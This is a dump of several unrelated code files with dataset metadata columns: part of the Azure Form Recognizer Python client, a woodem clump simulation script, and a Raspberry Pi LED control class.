file_stream=form,
content_type=content_type,
cls=kwargs.pop("cls", self._content_callback),
polling=True,
**kwargs
)
@distributed_trace
def begin_recognize_content_from_url(self, form_url, **kwargs):
# type: (str, Any) -> LROPoller[List[FormPage]]
"""Extract text and layout information from a given document.
The input document must be the location (URL) of the document to be analyzed.
:param str form_url: The URL of the form to analyze. The input must be a valid, encoded URL
of one of the supported formats: JPEG, PNG, PDF, TIFF, or BMP.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:keyword str language: The BCP-47 language code of the text in the document.
See supported language codes here:
https://docs.microsoft.com/azure/cognitive-services/form-recognizer/language-support.
Content supports auto language identification and multilanguage documents, so only
provide a language code if you would like to force the documented to be processed as
that specific language.
:keyword str reading_order: Reading order algorithm to sort the text lines returned. Supported
reading orders include: basic (default), natural. Set 'basic' to sort lines left to right and top
to bottom, although in some cases proximity is treated with higher priority. Set 'natural' to sort
lines by using positional information to keep nearby lines together.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.FormPage`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.FormPage]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *pages*, *language* and *reading_order* keyword arguments and support for image/bmp content
"""
pages = kwargs.pop("pages", None)
language = kwargs.pop("language", None)
reading_order = kwargs.pop("reading_order", None)
# FIXME: part of this code will be removed once autorest can handle diff mixin
# signatures across API versions
if pages:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"pages": pages})
else:
raise ValueError(
"'pages' is only available for API version V2_1 and up"
)
if reading_order:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"reading_order": reading_order})
else:
raise ValueError(
"'reading_order' is only available for API version V2_1 and up"
)
if language:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"language": language})
else:
raise ValueError(
"'language' is only available for API version V2_1 and up"
)
return self._client.begin_analyze_layout_async( # type: ignore
file_stream={"source": form_url},
cls=kwargs.pop("cls", self._content_callback),
polling=True,
**kwargs
)
@distributed_trace
def begin_recognize_custom_forms(self, model_id, form, **kwargs):
# type: (str, Union[bytes, IO[bytes]], Any) -> LROPoller[List[RecognizedForm]]
"""Analyze a custom form with a model trained with or without labels. The form
to analyze should be of the same type as the forms that were used to train the model.
The input document must be of one of the supported content types - 'application/pdf',
'image/jpeg', 'image/png', 'image/tiff', or 'image/bmp'.
:param str model_id: Custom model identifier.
:param form: JPEG, PNG, PDF, TIFF, or BMP type file stream or bytes.
:type form: bytes or IO[bytes]
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword content_type: Content-type of the body sent to the API. Content-type is
auto-detected, but can be overridden by passing this keyword argument. For options,
see :class:`~azure.ai.formrecognizer.FormContentType`.
:paramtype content_type: str or ~azure.ai.formrecognizer.FormContentType
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]
:raises ~azure.core.exceptions.HttpResponseError:
.. admonition:: Example:
.. literalinclude:: ../samples/sample_recognize_custom_forms.py
:start-after: [START recognize_custom_forms]
:end-before: [END recognize_custom_forms]
:language: python
:dedent: 8
:caption: Recognize fields and values from a custom form.
"""
if not model_id:
raise ValueError("model_id cannot be None or empty.")
pages = kwargs.pop("pages", None)
polling_interval = kwargs.pop(
"polling_interval", self._client._config.polling_interval
)
continuation_token = kwargs.pop("continuation_token", None)
content_type = kwargs.pop("content_type", None)
if content_type == "application/json":
raise TypeError(
"Call begin_recognize_custom_forms_from_url() to analyze a document from a URL."
)
if content_type is None and continuation_token is None:
content_type = get_content_type(form)
include_field_elements = kwargs.pop("include_field_elements", False)
def analyze_callback(
raw_response, _, headers
): # pylint: disable=unused-argument
analyze_result = self._deserialize(
self._generated_models.AnalyzeOperationResult, raw_response
)
return prepare_form_result(analyze_result, model_id)
callback = kwargs.pop("cls", analyze_callback)
polling = LROBasePolling(
timeout=polling_interval, lro_algorithms=[AnalyzePolling()], **kwargs
)
# FIXME: part of this code will be removed once autorest can handle diff mixin
# signatures across API versions
if pages:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"pages": pages})
else:
raise ValueError(
"'pages' is only available for API version V2_1 and up"
)
return self._client.begin_analyze_with_custom_model( # type: ignore
file_stream=form,
model_id=model_id,
include_text_details=include_field_elements,
content_type=content_type,
cls=callback,
polling=polling,
continuation_token=continuation_token,
**kwargs
)
@distributed_trace
def begin_recognize_custom_forms_from_url(self, model_id, form_url, **kwargs):
# type: (str, str, Any) -> LROPoller[List[RecognizedForm]]
"""Analyze a custom form with a model trained with or without labels. The form
to analyze should be of the same type as the forms that were used to train the model.
The input document must be the location (URL) of the document to be analyzed.
:param str model_id: Custom model identifier.
:param str form_url: The URL of the form to analyze. The input must be a valid, encoded URL
of one of the supported formats: JPEG, PNG, PDF, TIFF, or BMP.
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]
:raises ~azure.core.exceptions.HttpResponseError:
"""
if not model_id:
raise ValueError("model_id cannot be None or empty.")
pages = kwargs.pop("pages", None)
continuation_token = kwargs.pop("continuation_token", None)
include_field_elements = kwargs.pop("include_field_elements", False)
polling_interval = kwargs.pop(
"polling_interval", self._client._config.polling_interval
)
def analyze_callback(
raw_response, _, headers
): # pylint: disable=unused-argument
analyze_result = self._deserialize(
self._generated_models.AnalyzeOperationResult, raw_response
)
return prepare_form_result(analyze_result, model_id)
callback = kwargs.pop("cls", analyze_callback)
polling = LROBasePolling(
timeout=polling_interval, lro_algorithms=[AnalyzePolling()], **kwargs
)
# FIXME: part of this code will be removed once autorest can handle diff mixin
# signatures across API versions
if pages:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"pages": pages})
else:
raise ValueError(
"'pages' is only available for API version V2_1 and up"
)
return self._client.begin_analyze_with_custom_model( # type: ignore
file_stream={"source": form_url},
model_id=model_id,
include_text_details=include_field_elements,
cls=callback,
polling=polling,
continuation_token=continuation_token,
**kwargs
)
def close(self):
# type: () -> None
"""Close the :class:`~azure.ai.formrecognizer.FormRecognizerClient` session."""
return self._client.close()
def __enter__(self):
# type: () -> FormRecognizerClient
self._client.__enter__() # pylint:disable=no-member
return self
def __exit__(self, *args):
# type: (*Any) -> None
self._client.__exit__(*args) # pylint:disable=no-member
| mit | 2,438,171,152,693,971,500 | 49.569677 | 117 | 0.628183 | false |
gladk/woodem | scripts/test-OLD/clump.py | 3 | 1095 | from woo.core import*
from woo.dem import *
O.scene.engines=[
ForceResetter(),
InsertionSortCollider([
Bo1_Sphere_Aabb(),
Bo1_Box_Aabb(),
]),
InteractionLoop(
[Ig2_Sphere_Sphere_ScGeom(),Ig2_Box_Sphere_ScGeom()],
[Ip2_FrictMat_FrictMat_FrictPhys()],
[Law2_ScGeom_FrictPhys_CundallStrack()]
),
GravityEngine(gravity=[0,0,-9.81]),
NewtonIntegrator(damping=.2,exactAsphericalRot=True)
]
# support
O.dem.par.append(utils.box([0,0,-1.5],[3,3,.2],dynamic=False))
# stand-alone sphere
O.dem.par.append(utils.sphere([0,0,0],.5))
# clumps
relPos=[(0,-.5,-.5),(0,.5,0),(.5,0,0),(0,0,.5)]
coords=[(-2,0,0),(2,0,0),(0,2,0),(0,-2,0)]
for i,cc in enumerate(coords):
# This shorthand command does something like this:
# O.bodies.appendClumped([utils.sphere(...),utils.sphere(...),utils.sphere(...)])
# and returns tuple of clumpId,[bodyId1,bodyId2,bodyId3]
clump,spheres=O.dem.parappendClumped([utils.sphere([relPos[j][0]+coords[i][0],relPos[j][1]+coords[i][1],relPos[j][2]+coords[i][2]],.5) for j in range(0,i+1)])
print clump,spheres
O.scene.dt=utils.PWaveTimeStep()
O.saveTmp('init')
| gpl-2.0 | -6,718,273,865,120,026,000 | 33.21875 | 159 | 0.679452 | false |
JustinPead/card_authenticator | leds.py | 1 | 1280 | import RPi.GPIO as GPIO
import time
import logging
class LEDs:
def __init__(self, logger=logging.getLogger(__name__)):
self.logger = logger
GPIO.setmode(GPIO.BOARD)
#GPIO.setwarnings(False)
#success LED
GPIO.setup(13,GPIO.OUT)
GPIO.output(13,0)
#Busy LED
GPIO.setup(7,GPIO.OUT)
GPIO.output(7,0)
#fail LED
GPIO.setup(12,GPIO.OUT)
GPIO.output(12,0)
logging.debug("LEDS initialised")
def __enter__(self):
return self
def busyOff(self):
GPIO.output(7,0)
def orange(self):
GPIO.output(7,1)
def green(self):
self.busyOff();
for _ in range(6):
GPIO.output(13,1)
time.sleep(0.3)
GPIO.output(13,0)
time.sleep(0.3)
self.logger.debug("Flashed success LED")
def red(self):
self.busyOff();
for _ in range(6):
GPIO.output(12,1)
time.sleep(0.3)
GPIO.output(12,0)
time.sleep(0.3)
logging.info("Flashed failed LED")
def __exit__(self, type, value, traceback):
self.logger.debug("lights exited")
GPIO.cleanup() | mit | -5,834,391,912,933,659,000 | 23.64 | 59 | 0.505469 | false |
Subsets and Splits